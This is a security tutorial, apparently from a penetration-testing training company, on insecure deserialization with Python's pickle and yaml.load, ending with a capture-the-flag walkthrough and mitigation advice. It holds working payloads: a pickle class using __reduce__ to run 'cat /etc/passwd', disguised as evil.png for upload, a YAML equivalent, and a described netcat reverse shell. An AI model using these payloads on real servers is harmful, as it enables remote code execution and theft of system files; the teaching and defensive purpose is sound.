Python Serialization Vulnerabilities – Pickle
Python Serialization Vulnerabilities – Pickle
Contents
Introduction ........................................................................................... 3
Serialization in Python ........................................................................... 3
Serialization in Web Apps ...................................................................... 5
Over Pickling ........................................................................................... 5
Let's see a small example. ................................................................................ 6
Python YAML vs Python Pickle ............................................................... 8
Mitigation ............................................................................................... 9
JSON ................................................................................................................ 9
msgpack......................................................................................................... 10
Demonstration ..................................................................................... 10
Conclusion ............................................................................................ 17
Page 2 of 17
Python Serialization Vulnerabilities - Pickle
Introduction
Serialization gathers up the data from objects and converts them to a string of bytes, and writes to disk.
The data can be deserialized and the original objects can be recreated. Many programming languages
offer a way to do this including PHP, Java, Ruby and Python (common backend coding languages in web).
Let's talk about serialization in Python. In Python, when we can use the pickle module, the serialization is
called “pickling.”
Serialization in Python
While using Python, pickle.dumps() is used to serialize some data and pickle.loads() is used to deserialize
it (pickling and unpickling). For eg: here is an array, pickled.
1. python3
2. >>> import pickle
3. >>> variable = pickle.dumps([1,2,3])
4. >>> print(variable)
5. b'\x80\x04\x95\x0b\x00\x00\x00\x00\x00\x00\x00]\x94(K\x01K\x02K\x03e.'
6. >>> pickle.loads(variable)
7. [1, 2, 3]
8. >>>
As we can see above, when we print the variable, we see a byte string. This is serialization. Later, with
pickle.loads(variable) we are deserializing the object.
This is helpful in many cases, including when we want to save some variables from a program on the drive
as a binary which can be later used in other programs. For example, let’s create an array and save it as a
binary file.
Page 3 of 17
1. import pickle
2. variable = pickle.dumps([1,2,3])
3. with open("myarray.pkl","wb") as f:
4. f.write(variable)
As we can see, a pickle binary is now stored on the drive. Let's read it using pickle again.
1. import pickle
2. obj = open("myarray.pkl","rb").read()
3. pickle.loads(obj)
Page 4 of 17
As you can see, we can now operate on this deserialized object (obj) just like an array again! Throughout
the SDLC, there may come a time where a developer would want to quit the IDE but wants to save all the
data and states of variables at the moment, that is where this is a helpful feature.
If we want a user's information and some data to be retained next time they interact with the server,
serialization is a wonderful use case. Just serialize some data, put it into a cookie (which is taking up user's
storage and not server's! WoW) and next request just deserialize it and use it on the site.
Pickle is used in python web apps to do this. But one caveat is that it deserializes unsafely and its content
is controlled by the client. Just adding, serialization in json is much safer! Unlike some other serialization
formats, JSON doesn't allow executable code to be embedded within the data. This eliminates the risk of
code injection vulnerabilities that can be exploited by malicious actors.
It is possible to construct malicious pickle data which will execute arbitrary code!
Over Pickling
We have talked about pickling well known data types like an array. But what if we were to pickle our own
custom classes? Python can easily understand and deserialize well known classes but what will it do with
custom classes like connection to servers and all those fancy networking scripts? It doesn't even make
Page 5 of 17
sense to serialize those but Python developers added a way to pickle that too. There is a chance that
discrepancies might happen when python tries to deserialize such objects.
Custom pickling and unpickling code can be used. When you define a class you can provide a mechanism
that states, 'here is what you should do when someone asks to unpickle you!' So when python goes to
unpickle this string of bytes, it might have to run some code to figure out how to properly reconstruct that
object. This code will be embedded in this pickle file.
Here is a code for proof of concept. This code is creating a class called EvilPickle. To implement support
for pickling on your custom object, you define a method called "__reduce__" which returns a function
and pair of arguments to call that function with. Here, a simple "cat /etc/passwd" would be run using
os.system function. Finally, this would be written in a binary file called backup.data.
1. python
2. import pickle
3. import os
4. class EvilPickle(object):
5. def __reduce__(self):
6. return (os.system, ('cat /etc/passwd', ))
7. pickle_data = pickle.dumps(EvilPickle())
8. with open("backup.data", "wb") as file:
9. file.write(pickle_data)
The idea here is to make the deserializer run cat /etc/passwd on their system. Let's try it out now! We
save the above code in evilpickle.py file and run it. Just to check, we'll cat the backup.data file. Here we
can clearly see something fishy!
The user deserializes it anyway and ends up giving out /etc/passwd file.
1. python
2. import pickle
3. pickle.loads(open("backup.data","rb").read())
Page 6 of 17
We can get even more nerdy and see what is happening under the hood by disassembling using
pickletools. Here, the pickling is done on unix like os (posix) which is stored in a SHORT variable and stored
in as 0 and each successive command after that in different numeric values on the stack. The `REDUCE`
opcode is used to call a callable (typically a Python function or method, here os.system (represented as
posix and system)) with arguments (called TUPLE. here, cat /etc/passwd). And finally, the program is
stopped.
The primary difference between tuples and lists is that tuples are immutable as opposed to lists which are
mutable. Therefore, it is possible to change a list but not a tuple. The contents of a tuple cannot change
once they have been created in Python due to the immutability of tuples.
Page 7 of 17
note: -a options gives some info about each steps while using pickletools
So since the pickle object is user controlled and it unpickles at server, we can even use this to get remote
server shell as well (using sockets and pickling it and finally providing it to the server)
PyTorch ML model up until recent times used pickle for serialization of ML models and was vulnerable to
arbitrary code execution. Safetensors overcame this issue.
1. import yaml
2. document = "!!python/object/apply:os.system ['cat /etc/passwd']"
3. yaml.load(document)
This would also execute cat /etc/passwd. We can avoid this by using "safe_load()" instead of load anyway!
Page 8 of 17
Mitigation
Pickle is just one module in Python. This is a very well-known tool and developers use it still but if the
developers are a little more mindful, they’ll not ignore the warning shown below on pickle’s
documentation page:
JSON
1. import json
2. # Serialize
3. data = {"key": "value"}
4. json_data = json.dumps(data)
5. # Deserialize
6. deserialized_data = json.loads(json_data)
Page 9 of 17
msgpack
1. import msgpack
2. # Serialize
3. data = {"key": "value"}
4. msgpack_data = msgpack.packb(data)
5. # Deserialize
6. deserialized_data = msgpack.unpackb(msgpack_data, raw=False)
Some other safe options to use would be: protobuf by google, CBOR.
Demonstration
Okay, so the given website is a note taking website which is using serialization. Here is what happens when
I submit a note with a PNG image.
This looks something like this when processed by the server. Observe the URL which is rendering a .pickle
file
Page 10 of 17
The challenge also provided us with an app.py source code which tells us all about the background logic.
I can’t post the entire code but here are some relevant snippets.
Page 11 of 17
As we can see, the code is accepting title, content and image as an object, pickling it and storing it in
title.pickle
1. Note() class accepts an object new_note with 3 items: title, content, image_filename.
2. save_note() is calling pickle.dumps() to pickle new_note. save_note() is also called to store an image
using image.save which is a flask function. Similarly image.filename extracts image's filename.
3. secure_filename() function converts insecure names to secure ones. For example: note 1 becomes
note_1, ../../../etc/passwd becomes etc_passwd
4. unpickle_file is loading the pickled file provided to it and unpickles it.
Here are some key takeaways about the functionality of the code:
Page 12 of 17
1. Site is accepting 3 key items.
2. It is not checking if PNG is safe or not (as in if it is a valid PNG or not. This is a good attack point)
3. All in all, PNG file upload is a really strong contender to put code in because: a, site isn't validating safety
of PNG and b, it will unpickle any file we provide.
I tried with a simple cat /etc/passwd command on my local machine and the evil.png pickled file was
deserializing properly!
1. import pickle
2. import os
3. class EvilPickle(object):
4. def __reduce__(self):
5. return (os.system, ('cat /etc/passwd', ))
6. pickle_data = pickle.dumps(EvilPickle())
7. with open("evil.png", "wb") as file:
8. file.write(pickle_data)
Page 13 of 17
Let's take it a step further and use a netcat listener to receive data from deserialized local execution of
evil.png and have it give us a shell!
Page 14 of 17
By following the same logic, we could exploit the server. First I create a PNG file and upload it on the
server.
Page 15 of 17
The uploaded data becomes a pickle file which gets stored on the server and when it is called, data is
visible on the screen (it is unpickled).
Page 16 of 17
This is how we root the box! Please note that I hid and altered a few details throughout the CTF section
of the article because the CTF is still an ongoing challenge and I couldn’t obtain permission to post a
complete solution.
Conclusion
Serialization vulnerabilities are easy to exploit and easy to overlook by developers. One can even achieve
arbitrary code execution on machines. As we saw, when deserialization insecurely or by using insecure
functions, we put our infrastructure at risk for compromise. Developers should carefully read the
documentation page and not ignore warnings. And finally, use languages like json to serialize/deserialize
data which can’t be used to contain executable code since it is a data-only language. Thanks for reading.
Page 17 of 17
JOIN OUR
TRAINING PROGRAMS
H ERE
CLICK BEGINNER
Network Pentest
Wireless Pentest
ADVANCED
Advanced CTF
Android Pentest Metasploit
EXPERT
Privilege Escalation
APT’s - MITRE Attack Tactics
Windows
Active Directory Attack
Linux
MSSQL Security Assessment
www.ignitetechnologies.in